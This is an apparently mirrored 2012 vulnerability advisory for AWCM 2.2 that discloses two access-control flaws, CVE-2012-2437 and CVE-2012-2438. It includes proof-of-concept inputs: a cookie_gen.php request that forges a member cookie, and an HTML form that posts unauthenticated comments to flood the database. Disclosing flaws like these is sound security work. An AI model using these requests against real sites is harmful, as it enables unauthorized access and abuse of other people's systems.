Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28750
HistoryNov 09, 2012 - 12:00 a.m.

Vulnerability Report on AWCM 2.2

2012-11-0900:00:00
vulners.com
5

Vulnerability Report AWCM 2.2

CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438
Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts
DB records.
Author: Sooel Son [sonpostman (at) gmail (dot) com]
Source Code: http://sourceforge.net/projects/awcm/

  1. Details: CVE-2012-2437
    Without going through an authentication procedure, anyone can
    forge a cookie, the
    pairs of key and value.

     Proof of Concept Code: Initiate the following URL request.
     http://targethost/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
     ex) http://targethost/awcm/cookie_gen.php?
    

name=awcm_member&content=123456

  1. Details CVE-2012-2438
    There is no access control protection for adversaries to
    insert millions of
    comment records on the database on show_video.php and topic.php.

     Proof of Concept Code:
     [form action=\"http://targethost/awcm/show_video.php?coment=exploit\"
     method=\"post\"]
       [input type=\"hidden\" name=\"coment\" value=\'insert
    

uninvited comments 2\' /]
[input type=\"submit\" value=\"Submit\"]
</form>

##########################
Vendor Notification

  • Nov 5th: Acknowledge the vendors, but no responses.
Related for SECURITYVULNS:DOC:28750